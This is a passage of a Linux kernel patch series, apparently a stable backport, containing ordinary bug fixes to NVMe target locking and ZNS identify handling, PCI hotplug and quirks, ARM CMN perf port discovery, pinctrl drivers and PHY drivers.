+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	active = tfcp_req->active;
+ 	aborted = tfcp_req->aborted;
+ 	tfcp_req->active = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(active))
+ 		/* illegal - call while i/o active */
+@@ -821,9 +825,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 
+ 	if (unlikely(aborted)) {
+ 		/* target transport has aborted i/o prior */
+-		spin_lock_irq(&tfcp_req->reqlock);
++		spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 		tfcp_req->active = false;
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		tgt_fcpreq->transferred_length = 0;
+ 		tgt_fcpreq->fcp_error = -ECANCELED;
+ 		tgt_fcpreq->done(tgt_fcpreq);
+@@ -880,9 +884,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 		break;
+ 	}
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->active = false;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tgt_fcpreq->transferred_length = xfrlen;
+ 	tgt_fcpreq->fcp_error = fcp_err;
+@@ -896,15 +900,16 @@ fcloop_tgt_fcp_abort(struct nvmet_fc_target_port *tgtport,
+ 			struct nvmefc_tgt_fcp_req *tgt_fcpreq)
+ {
+ 	struct fcloop_fcpreq *tfcp_req = tgt_fcp_req_to_fcpreq(tgt_fcpreq);
++	unsigned long flags;
+ 
+ 	/*
+ 	 * mark aborted only in case there were 2 threads in transport
+ 	 * (one doing io, other doing abort) and only kills ops posted
+ 	 * after the abort request
+ 	 */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->aborted = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tfcp_req->status = NVME_SC_INTERNAL;
+ 
+@@ -946,6 +951,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 	struct fcloop_ini_fcpreq *inireq = fcpreq->private;
+ 	struct fcloop_fcpreq *tfcp_req;
+ 	bool abortio = true;
++	unsigned long flags;
+ 
+ 	spin_lock(&inireq->inilock);
+ 	tfcp_req = inireq->tfcp_req;
+@@ -958,7 +964,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		return;
+ 
+ 	/* break initiator/target relationship for io */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 	case INI_IO_ACTIVE:
+@@ -968,11 +974,11 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		abortio = false;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (abortio)
+ 		/* leave the reference while the work item is scheduled */
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index bda1c1f71f394..273cca49a040f 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -578,7 +578,7 @@ bool nvmet_ns_revalidate(struct nvmet_ns *ns);
+ u16 blk_to_nvme_status(struct nvmet_req *req, blk_status_t blk_sts);
+ 
+ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns);
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req);
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req);
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_recv(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_send(struct nvmet_req *req);
+diff --git a/drivers/nvme/target/zns.c b/drivers/nvme/target/zns.c
+index 1254cf57e008d..d93ee4ae19454 100644
+--- a/drivers/nvme/target/zns.c
++++ b/drivers/nvme/target/zns.c
+@@ -70,7 +70,7 @@ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns)
+ 	return true;
+ }
+ 
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req)
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req)
+ {
+ 	u8 zasl = req->sq->ctrl->subsys->zasl;
+ 	struct nvmet_ctrl *ctrl = req->sq->ctrl;
+@@ -97,7 +97,7 @@ out:
+ 
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ {
+-	struct nvme_id_ns_zns *id_zns;
++	struct nvme_id_ns_zns *id_zns = NULL;
+ 	u64 zsze;
+ 	u16 status;
+ 	u32 mar, mor;
+@@ -118,16 +118,18 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 	if (status)
+ 		goto done;
+ 
+-	if (!bdev_is_zoned(req->ns->bdev)) {
+-		req->error_loc = offsetof(struct nvme_identify, nsid);
+-		goto done;
+-	}
+-
+ 	if (nvmet_ns_revalidate(req->ns)) {
+ 		mutex_lock(&req->ns->subsys->lock);
+ 		nvmet_ns_changed(req->ns->subsys, req->ns->nsid);
+ 		mutex_unlock(&req->ns->subsys->lock);
+ 	}
++
++	if (!bdev_is_zoned(req->ns->bdev)) {
++		status = NVME_SC_INVALID_FIELD | NVME_SC_DNR;
++		req->error_loc = offsetof(struct nvme_identify, nsid);
++		goto out;
++	}
++
+ 	zsze = (bdev_zone_sectors(req->ns->bdev) << 9) >>
+ 					req->ns->blksize_shift;
+ 	id_zns->lbafe[0].zsze = cpu_to_le64(zsze);
+@@ -148,8 +150,8 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 
+ done:
+ 	status = nvmet_copy_to_sgl(req, 0, id_zns, sizeof(*id_zns));
+-	kfree(id_zns);
+ out:
++	kfree(id_zns);
+ 	nvmet_req_complete(req, status);
+ }
+ 
+diff --git a/drivers/of/device.c b/drivers/of/device.c
+index 8cefe5a7d04e2..ce225d2590b54 100644
+--- a/drivers/of/device.c
++++ b/drivers/of/device.c
+@@ -297,12 +297,15 @@ int of_device_request_module(struct device *dev)
+ 	if (size < 0)
+ 		return size;
+ 
+-	str = kmalloc(size + 1, GFP_KERNEL);
++	/* Reserve an additional byte for the trailing '\0' */
++	size++;
++
++	str = kmalloc(size, GFP_KERNEL);
+ 	if (!str)
+ 		return -ENOMEM;
+ 
+ 	of_device_get_modalias(dev, str, size);
+-	str[size] = '\0';
++	str[size - 1] = '\0';
+ 	ret = request_module(str);
+ 	kfree(str);
+ 
+diff --git a/drivers/pci/controller/dwc/Kconfig b/drivers/pci/controller/dwc/Kconfig
+index 62ce3abf0f196..ae9d083c406f8 100644
+--- a/drivers/pci/controller/dwc/Kconfig
++++ b/drivers/pci/controller/dwc/Kconfig
+@@ -294,6 +294,7 @@ config PCI_MESON
+ 	default m if ARCH_MESON
+ 	depends on PCI_MSI_IRQ_DOMAIN
+ 	select PCIE_DW_HOST
++	select REGMAP_MMIO
+ 	help
+ 	  Say Y here if you want to enable PCI controller support on Amlogic
+ 	  SoCs. The PCI controller on Amlogic is based on DesignWare hardware
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 1dde5c579edc8..47db2d20568ef 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -1402,6 +1402,13 @@ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_SYNOPSYS, 0xabcd,
+ static int __init imx6_pcie_init(void)
+ {
+ #ifdef CONFIG_ARM
++	struct device_node *np;
++
++	np = of_find_matching_node(NULL, imx6_pcie_of_match);
++	if (!np)
++		return -ENODEV;
++	of_node_put(np);
++
+ 	/*
+ 	 * Since probe() can be deferred we need to make sure that
+ 	 * hook_fault_code is not called after __init memory is freed
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index f8e512540fb85..dbe6df0cb6118 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1276,11 +1276,9 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	val &= ~REQ_NOT_ENTR_L1;
+ 	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
+ 
+-	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-	}
++	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val |= BIT(31);
++	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+diff --git a/drivers/pci/hotplug/pciehp_pci.c b/drivers/pci/hotplug/pciehp_pci.c
+index d17f3bf36f709..ad12515a4a121 100644
+--- a/drivers/pci/hotplug/pciehp_pci.c
++++ b/drivers/pci/hotplug/pciehp_pci.c
+@@ -63,7 +63,14 @@ int pciehp_configure_device(struct controller *ctrl)
+ 
+ 	pci_assign_unassigned_bridge_resources(bridge);
+ 	pcie_bus_configure_settings(parent);
++
++	/*
++	 * Release reset_lock during driver binding
++	 * to avoid AB-BA deadlock with device_lock.
++	 */
++	up_read(&ctrl->reset_lock);
+ 	pci_bus_add_devices(parent);
++	down_read_nested(&ctrl->reset_lock, ctrl->depth);
+ 
+  out:
+ 	pci_unlock_rescan_remove();
+@@ -104,7 +111,15 @@ void pciehp_unconfigure_device(struct controller *ctrl, bool presence)
+ 	list_for_each_entry_safe_reverse(dev, temp, &parent->devices,
+ 					 bus_list) {
+ 		pci_dev_get(dev);
++
++		/*
++		 * Release reset_lock during driver unbinding
++		 * to avoid AB-BA deadlock with device_lock.
++		 */
++		up_read(&ctrl->reset_lock);
+ 		pci_stop_and_remove_bus_device(dev);
++		down_read_nested(&ctrl->reset_lock, ctrl->depth);
++
+ 		/*
+ 		 * Ensure that no new Requests will be generated from
+ 		 * the device.
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index a6b9b479b97ad..87734e4c3c204 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -193,6 +193,7 @@ send_ost:
+ 	 */
+ 	if (estate == PCI_ERS_RESULT_RECOVERED) {
+ 		pci_dbg(edev, "DPC port successfully recovered\n");
++		pcie_clear_device_status(edev);
+ 		acpi_send_edr_status(pdev, edev, EDR_OST_SUCCESS);
+ 	} else {
+ 		pci_dbg(edev, "DPC port recovery failed\n");
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 494fa46f57671..8d32a3834688f 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -1939,6 +1939,19 @@ static void quirk_radeon_pm(struct pci_dev *dev)
+ }
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x6741, quirk_radeon_pm);
+ 
++/*
++ * NVIDIA Ampere-based HDA controllers can wedge the whole device if a bus
++ * reset is performed too soon after transition to D0, extend d3hot_delay
++ * to previous effective default for all NVIDIA HDA controllers.
++ */
++static void quirk_nvidia_hda_pm(struct pci_dev *dev)
++{
++	quirk_d3hot_delay(dev, 20);
++}
++DECLARE_PCI_FIXUP_CLASS_FINAL(PCI_VENDOR_ID_NVIDIA, PCI_ANY_ID,
++			      PCI_CLASS_MULTIMEDIA_HD_AUDIO, 8,
++			      quirk_nvidia_hda_pm);
++
+ /*
+  * Ryzen5/7 XHCI controllers fail upon resume from runtime suspend or s2idle.
+  * https://bugzilla.kernel.org/show_bug.cgi?id=205587
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 1deb61b22bc76..ff86075edca48 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -57,14 +57,12 @@
+ #define CMN_INFO_REQ_VC_NUM		GENMASK_ULL(1, 0)
+ 
+ /* XPs also have some local topology info which has uses too */
+-#define CMN_MXP__CONNECT_INFO_P0	0x0008
+-#define CMN_MXP__CONNECT_INFO_P1	0x0010
+-#define CMN_MXP__CONNECT_INFO_P2	0x0028
+-#define CMN_MXP__CONNECT_INFO_P3	0x0030
+-#define CMN_MXP__CONNECT_INFO_P4	0x0038
+-#define CMN_MXP__CONNECT_INFO_P5	0x0040
++#define CMN_MXP__CONNECT_INFO(p)	(0x0008 + 8 * (p))
+ #define CMN__CONNECT_INFO_DEVICE_TYPE	GENMASK_ULL(4, 0)
+ 
++#define CMN_MAX_PORTS			6
++#define CI700_CONNECT_INFO_P2_5_OFFSET	0x10
++
+ /* PMU registers occupy the 3rd 4KB page of each node's region */
+ #define CMN_PMU_OFFSET			0x2000
+ 
+@@ -166,7 +164,7 @@
+ #define CMN_EVENT_BYNODEID(event)	FIELD_GET(CMN_CONFIG_BYNODEID, (event)->attr.config)
+ #define CMN_EVENT_NODEID(event)		FIELD_GET(CMN_CONFIG_NODEID, (event)->attr.config)
+ 
+-#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(27, 24)
++#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(30, 27)
+ #define CMN_CONFIG_WP_DEV_SEL		GENMASK_ULL(50, 48)
+ #define CMN_CONFIG_WP_CHN_SEL		GENMASK_ULL(55, 51)
+ /* Note that we don't yet support the tertiary match group on newer IPs */
+@@ -396,6 +394,25 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
++				       const struct arm_cmn_node *xp, int port)
++{
++	int offset = CMN_MXP__CONNECT_INFO(port);
++
++	if (port >= 2) {
++		if (cmn->model & (CMN600 | CMN650))
++			return 0;
++		/*
++		 * CI-700 may have extra ports, but still has the
++		 * mesh_port_connect_info registers in the way.
++		 */
++		if (cmn->model == CI700)
++			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
++	}
++
++	return readl_relaxed(xp->pmu_base - CMN_PMU_OFFSET + offset);
++}
++
+ static struct dentry *arm_cmn_debugfs;
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -469,7 +486,7 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 	y = cmn->mesh_y;
+ 	while (y--) {
+ 		int xp_base = cmn->mesh_x * y;
+-		u8 port[6][CMN_MAX_DIMENSION];
++		u8 port[CMN_MAX_PORTS][CMN_MAX_DIMENSION];
+ 
+ 		for (x = 0; x < cmn->mesh_x; x++)
+ 			seq_puts(s, "--------+");
+@@ -477,14 +494,9 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 		seq_printf(s, "\n%d    |", y);
+ 		for (x = 0; x < cmn->mesh_x; x++) {
+ 			struct arm_cmn_node *xp = cmn->xps + xp_base + x;
+-			void __iomem *base = xp->pmu_base - CMN_PMU_OFFSET;
+-
+-			port[0][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P0);
+-			port[1][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P1);
+-			port[2][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P2);
+-			port[3][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P3);
+-			port[4][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P4);
+-			port[5][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P5);
++
++			for (p = 0; p < CMN_MAX_PORTS; p++)
++				port[p][x] = arm_cmn_device_connect_info(cmn, xp, p);
+ 			seq_printf(s, " XP #%-2d |", xp_base + x);
+ 		}
+ 
+@@ -2082,18 +2094,9 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		 * from this, since in that case we will see at least one XP
+ 		 * with port 2 connected, for the HN-D.
+ 		 */
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P0))
+-			xp_ports |= BIT(0);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P1))
+-			xp_ports |= BIT(1);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P2))
+-			xp_ports |= BIT(2);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P3))
+-			xp_ports |= BIT(3);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P4))
+-			xp_ports |= BIT(4);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P5))
+-			xp_ports |= BIT(5);
++		for (int p = 0; p < CMN_MAX_PORTS; p++)
++			if (arm_cmn_device_connect_info(cmn, xp, p))
++				xp_ports |= BIT(p);
+ 
+ 		if (cmn->multi_dtm && (xp_ports & 0xc))
+ 			arm_cmn_init_dtm(dtm++, xp, 1);
+diff --git a/drivers/perf/riscv_pmu_sbi.c b/drivers/perf/riscv_pmu_sbi.c
+index 3852c18362f53..382fe5ee6100b 100644
+--- a/drivers/perf/riscv_pmu_sbi.c
++++ b/drivers/perf/riscv_pmu_sbi.c
+@@ -869,7 +869,7 @@ static int __init pmu_sbi_devinit(void)
+ 	struct platform_device *pdev;
+ 
+ 	if (sbi_spec_version < sbi_mk_version(0, 3) ||
+-	    sbi_probe_extension(SBI_EXT_PMU) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_PMU)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index bb40172e23d49..876a713e3874f 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -1738,7 +1738,7 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+-	.lanes			= 1,
++	.lanes			= 2,
+ 
+ 	.tables = {
+ 		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index dce45fbbd699c..ce14645a86ecb 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -782,6 +782,7 @@ static int tegra_xusb_add_usb2_port(struct tegra_xusb_padctl *padctl,
+ 	usb2->base.lane = usb2->base.ops->map(&usb2->base);
+ 	if (IS_ERR(usb2->base.lane)) {
+ 		err = PTR_ERR(usb2->base.lane);
++		tegra_xusb_port_unregister(&usb2->base);
+ 		goto out;
+ 	}
+ 
+@@ -848,6 +849,7 @@ static int tegra_xusb_add_ulpi_port(struct tegra_xusb_padctl *padctl,
+ 	ulpi->base.lane = ulpi->base.ops->map(&ulpi->base);
+ 	if (IS_ERR(ulpi->base.lane)) {
+ 		err = PTR_ERR(ulpi->base.lane);
++		tegra_xusb_port_unregister(&ulpi->base);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/phy/ti/phy-j721e-wiz.c b/drivers/phy/ti/phy-j721e-wiz.c
+index 41725c6bcdf6f..6a63380f6a71f 100644
+--- a/drivers/phy/ti/phy-j721e-wiz.c
++++ b/drivers/phy/ti/phy-j721e-wiz.c
+@@ -422,18 +422,17 @@ static int wiz_mode_select(struct wiz *wiz)
+ 	int i;
+ 
+ 	for (i = 0; i < num_lanes; i++) {
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_DP)
++		if (wiz->lane_phy_type[i] == PHY_TYPE_DP) {
+ 			mode = LANE_MODE_GEN1;
+-		else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII)
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII) {
+ 			mode = LANE_MODE_GEN2;
+-		else
+-			continue;
+-
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
+ 			ret = regmap_field_write(wiz->p0_mac_src_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_rxfclk_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_refclk_sel[i], 0x3);
+ 			mode = LANE_MODE_GEN1;
++		} else {
++			continue;
+ 		}
+ 
+ 		ret = regmap_field_write(wiz->p_standard_mode[i], mode);
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index c7cdccdb4332a..0f1ab0829ffe6 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -90,6 +90,8 @@ struct bcm2835_pinctrl {
+ 	struct pinctrl_gpio_range gpio_range;
+ 
+ 	raw_spinlock_t irq_lock[BCM2835_NUM_BANKS];
++	/* Protect FSEL registers */
++	spinlock_t fsel_lock;
+ };
+ 
+ /* pins are just named GPIO0..GPIO53 */
+@@ -284,14 +286,19 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 		struct bcm2835_pinctrl *pc, unsigned pin,
+ 		enum bcm2835_fsel fsel)
+ {
+-	u32 val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
+-	enum bcm2835_fsel cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
++	u32 val;
++	enum bcm2835_fsel cur;
++	unsigned long flags;
++
++	spin_lock_irqsave(&pc->fsel_lock, flags);
++	val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
++	cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
+ 
+ 	dev_dbg(pc->dev, "read %08x (%u => %s)\n", val, pin,
+-			bcm2835_functions[cur]);
++		bcm2835_functions[cur]);
+ 
+ 	if (cur == fsel)
+-		return;
++		goto unlock;
+ 
+ 	if (cur != BCM2835_FSEL_GPIO_IN && fsel != BCM2835_FSEL_GPIO_IN) {
+ 		/* always transition through GPIO_IN */
+@@ -309,6 +316,9 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 	dev_dbg(pc->dev, "write %08x (%u <= %s)\n", val, pin,
+ 			bcm2835_functions[fsel]);
+ 	bcm2835_gpio_wr(pc, FSEL_REG(pin), val);
++
++unlock:
++	spin_unlock_irqrestore(&pc->fsel_lock, flags);
+ }
+ 
+ static int bcm2835_gpio_direction_input(struct gpio_chip *chip, unsigned offset)
+@@ -1248,6 +1258,7 @@ static int bcm2835_pinctrl_probe(struct platform_device *pdev)
+ 	pc->gpio_chip = *pdata->gpio_chip;
+ 	pc->gpio_chip.parent = dev;
+ 
++	spin_lock_init(&pc->fsel_lock);
+ 	for (i = 0; i < BCM2835_NUM_BANKS; i++) {
+ 		unsigned long events;
+ 		unsigned offset;
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index e97ce45b6d538..a55998ae29fa4 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -216,6 +216,15 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		}
+ 	}
+ 
++	/*
++	 * As per Hardware Programming Guide, when configuring pin as output,
++	 * set the pin value before setting output-enable (OE).
++	 */
++	if (output_enabled) {
++		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
++		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
++	}
++
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -225,11 +234,6 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
+ 
+-	if (output_enabled) {
+-		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
+-		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7620.c b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+index 22ff16eff02ff..929a1ace56aeb 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7620.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+@@ -372,6 +372,7 @@ static int mt7620_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7620_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7620-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7620_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7621.c b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+index b47968f40e0c2..0297cf455b3a0 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7621.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+@@ -97,6 +97,7 @@ static int mt7621_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7621_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7621-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7621_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt2880.c b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+index 811e12df11331..fd9af7c2ffd0e 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt2880.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+@@ -41,6 +41,7 @@ static int rt2880_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt2880_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt2880-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt2880_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt305x.c b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+index 5b204b7ca1f3c..13a012a65d1d8 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt305x.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+@@ -118,6 +118,7 @@ static int rt305x_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt305x_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt305x-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt305x_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt3883.c b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+index 44a66c3d2d2a1..b263764011e76 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt3883.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+@@ -88,6 +88,7 @@ static int rt3883_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt3883_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt3883-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt3883_pinctrl_match);
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779a0.c b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+index 760c83a8740bd..6069869353bb4 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779a0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+@@ -696,16 +696,8 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+ 
+ 	PINMUX_SINGLE(AVB0_PHY_INT),
+-	PINMUX_SINGLE(AVB0_MAGIC),
+-	PINMUX_SINGLE(AVB0_MDC),
+-	PINMUX_SINGLE(AVB0_MDIO),
+-	PINMUX_SINGLE(AVB0_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB1_PHY_INT),
+-	PINMUX_SINGLE(AVB1_MAGIC),
+-	PINMUX_SINGLE(AVB1_MDC),
+-	PINMUX_SINGLE(AVB1_MDIO),
+-	PINMUX_SINGLE(AVB1_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB2_AVTP_PPS),
+ 	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779f0.c b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+index 417c357f16b19..65c141ce909ac 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779f0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+@@ -1213,7 +1213,7 @@ static const unsigned int tsn1_avtp_pps_pins[] = {
+ 	RCAR_GP_PIN(3, 13),
+ };
